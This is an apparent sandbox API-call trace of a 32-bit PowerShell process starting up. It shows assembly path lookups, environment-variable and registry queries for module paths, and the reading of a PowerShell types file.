	[0221.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.219] GetLastError () returned 0x7a
	[0221.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae888, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.219] GetLastError () returned 0x7a
	[0221.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae838, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.219] GetLastError () returned 0x7a
	[0221.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae838, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.219] GetLastError () returned 0x7a
	[0221.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae838, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.219] GetLastError () returned 0x7a
	[0221.473] SetConsoleCtrlHandler (HandlerRoutine=0x283384a, Add=1) returned 1
	[0221.473] GetLastError () returned 0x7a
	[0221.482] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.482] GetLastError () returned 0xcb
	[0221.489] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0221.489] GetLastError () returned 0x0
	[0221.599] CoCreateGuid (in: pguid=0xaed68 | out: pguid=0xaed68*(Data1=0x1bfd2a61, Data2=0x8ace, Data3=0x40da, Data4=([0]=0x8b, [1]=0x86, [2]=0xf0, [3]=0xe8, [4]=0xfa, [5]=0x26, [6]=0x44, [7]=0xed))) returned 0x0
	[0221.625] WinSqmIsOptedIn () returned 0x0
	[0221.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.626] GetLastError () returned 0xcb
	[0221.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.632] GetLastError () returned 0xcb
	[0221.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.633] GetLastError () returned 0xcb
	[0221.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.636] GetLastError () returned 0xcb
	[0221.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.637] GetLastError () returned 0xcb
	[0221.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.756] GetLastError () returned 0xcb
	[0221.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.757] GetLastError () returned 0xcb
	[0221.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.758] GetLastError () returned 0xcb
	[0221.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.760] GetLastError () returned 0xcb
	[0221.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.766] GetLastError () returned 0xcb
	[0221.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.767] GetLastError () returned 0xcb
	[0221.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.768] GetLastError () returned 0xcb
	[0222.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.464] GetLastError () returned 0xcb
	[0222.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.464] GetLastError () returned 0xcb
	[0222.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.465] GetLastError () returned 0xcb
	[0222.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.465] GetLastError () returned 0xcb
	[0222.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.621] GetLastError () returned 0x3
	[0222.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.621] GetLastError () returned 0x3
	[0222.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.621] GetLastError () returned 0x3
	[0222.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.621] GetLastError () returned 0x3
	[0222.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.622] GetLastError () returned 0x3
	[0222.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.622] GetLastError () returned 0x3
	[0222.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.622] GetLastError () returned 0x3
	[0222.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.622] GetLastError () returned 0x3
	[0222.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.622] GetLastError () returned 0x3
	[0222.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.622] GetLastError () returned 0x3
	[0222.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.622] GetLastError () returned 0x3
	[0222.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0222.622] GetLastError () returned 0x3
	[0222.625] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0222.625] GetLastError () returned 0x3
	[0222.626] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3582a0, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShe") returned 0x76
	[0222.626] GetLastError () returned 0x3
	[0222.626] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3582a0, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0222.626] GetLastError () returned 0x3
	[0222.626] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xaeb80 | out: phkResult=0xaeb80*=0x358) returned 0x0
	[0222.626] RegQueryValueExW (in: hKey=0x358, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xaebc4, lpData=0x0, lpcbData=0xaebc0*=0x0 | out: lpType=0xaebc4*=0x2, lpData=0x0, lpcbData=0xaebc0*=0x6c) returned 0x0
	[0222.627] RegQueryValueExW (in: hKey=0x358, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xaebc4, lpData=0x3582a0, lpcbData=0xaebc0*=0x6c | out: lpType=0xaebc4*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xaebc0*=0x6c) returned 0x0
	[0222.627] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x3582a0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0222.627] GetLastError () returned 0x3
	[0222.627] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3582a0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0222.627] GetLastError () returned 0x3
	[0222.627] RegCloseKey (hKey=0x358) returned 0x0
	[0222.628] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3582a0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0222.628] GetLastError () returned 0x3
	[0222.628] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xaeb80 | out: phkResult=0xaeb80*=0x358) returned 0x0
	[0222.628] RegQueryValueExW (in: hKey=0x358, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xaebc4, lpData=0x0, lpcbData=0xaebc0*=0x0 | out: lpType=0xaebc4*=0x0, lpData=0x0, lpcbData=0xaebc0*=0x0) returned 0x2
	[0222.816] RegCloseKey (hKey=0x358) returned 0x0
	[0222.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.826] GetLastError () returned 0xcb
	[0222.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.828] GetLastError () returned 0xcb
	[0222.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.835] GetLastError () returned 0xcb
	[0222.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.835] GetLastError () returned 0xcb
	[0222.842] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xaeb00 | out: phkResult=0xaeb00*=0x358) returned 0x0
	[0222.843] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0xaeb68, lpData=0x0, lpcbData=0xaeb64*=0x0 | out: lpType=0xaeb68*=0x1, lpData=0x0, lpcbData=0xaeb64*=0x74) returned 0x0
	[0222.845] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0xaeb48, lpData=0x0, lpcbData=0xaeb44*=0x0 | out: lpType=0xaeb48*=0x1, lpData=0x0, lpcbData=0xaeb44*=0x74) returned 0x0
	[0222.845] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0xaeb48, lpData=0x3582a0, lpcbData=0xaeb44*=0x74 | out: lpType=0xaeb48*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xaeb44*=0x74) returned 0x0
	[0222.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xae6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0222.845] GetLastError () returned 0xcb
	[0222.845] SetErrorMode (uMode=0x1) returned 0x1
	[0222.845] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xaeb48 | out: lpFileInformation=0xaeb48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0222.845] GetLastError () returned 0xcb
	[0222.845] SetErrorMode (uMode=0x1) returned 0x1
	[0222.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xae6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0222.858] GetLastError () returned 0xcb
	[0222.858] SetErrorMode (uMode=0x1) returned 0x1
	[0222.858] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xaeb3c | out: lpFileInformation=0xaeb3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0222.858] GetLastError () returned 0xcb
	[0222.858] SetErrorMode (uMode=0x1) returned 0x1
	[0222.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xae6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0222.862] GetLastError () returned 0xcb
	[0222.862] SetErrorMode (uMode=0x1) returned 0x1
	[0222.862] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xaeb3c | out: lpFileInformation=0xaeb3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0222.862] GetLastError () returned 0xcb
	[0222.862] SetErrorMode (uMode=0x1) returned 0x1
	[0222.962] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.962] GetLastError () returned 0xcb
	[0222.965] GetACP () returned 0x4e4
	[0222.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xae54c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0222.979] GetLastError () returned 0xcb
	[0222.979] SetErrorMode (uMode=0x1) returned 0x1
	[0222.983] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x360
	[0222.983] GetLastError () returned 0x0
	[0222.984] GetFileType (hFile=0x360) returned 0x1
	[0222.984] SetErrorMode (uMode=0x1) returned 0x1
	[0222.984] GetFileType (hFile=0x360) returned 0x1
	[0222.986] ReadFile (in: hFile=0x360, lpBuffer=0x2a3d270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a3d270*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0222.987] GetLastError () returned 0x0
	[0222.988] ReadFile (in: hFile=0x360, lpBuffer=0x2a3d270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a3d270*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0222.988] GetLastError () returned 0x0
	[0222.988] ReadFile (in: hFile=0x360, lpBuffer=0x2a3d270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a3d270*, lpNumberOfBytesRead=0xaeab4*=0x1000, lpOverlapped=0x0) returned 1
	[0222.988] GetLastError () returned 0x0
	[0222.989] ReadFile (in: hFile=0x360, lpBuffer=0x2a3d270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a3d270*, lpNumberOfBytesRead=0xaeab4*=0xcf3, lpOverlapped=0x0) returned 1
	[0222.989] GetLastError () returned 0x0
	[0222.989] ReadFile (in: hFile=0x360, lpBuffer=0x2a3c703, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a3c703*, lpNumberOfBytesRead=0xaeab4*=0x0, lpOverlapped=0x0) returned 1
	[0222.989] GetLastError () returned 0x0
	[0222.989] ReadFile (in: hFile=0x360, lpBuffer=0x2a3d270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xaeab4, lpOverlapped=0x0 | out: lpBuffer=0x2a3d270*, lpNumberOfBytesRead=0xaeab4*=0x0, lpOverlapped=0x0) returned 1
	[0222.989] GetLastError () returned 0x0
	[0222.990] CloseHandle (hObject=0x360) returned 1
	[0222.990] GetLastError () returned 0x0
	[0222.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xae614, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0222.991] GetLastError () returned 0x0
	[0222.991] SetErrorMode (uMode=0x1) returned 0x1
	[0222.991] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2a4e5e4 | out: lpFileInformation=0x2a4e5e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0222.991] GetLastError () returned 0x0
	[0222.991] SetErrorMode (uMode=0x1) returned 0x1
	[0222.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xae5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0222.992] GetLastError () returned 0x0
	[0222.992] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xaea38 | out: phkResult=0xaea38*=0x360) returned 0x0
	[0222.992] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaea80, lpData=0x0, lpcbData=0xaea7c*=0x0 | out: lpType=0xaea80*=0x1, lpData=0x0, lpcbData=0xaea7c*=0x56) returned 0x0
	[0222.992] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaea80, lpData=0x3582a0, lpcbData=0xaea7c*=0x56 | out: lpType=0xaea80*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xaea7c*=0x56) returned 0x0
	[0222.993] RegCloseKey (hKey=0x360) returned 0x0
	[0222.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xae5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0222.993] GetLastError () returned 0x0
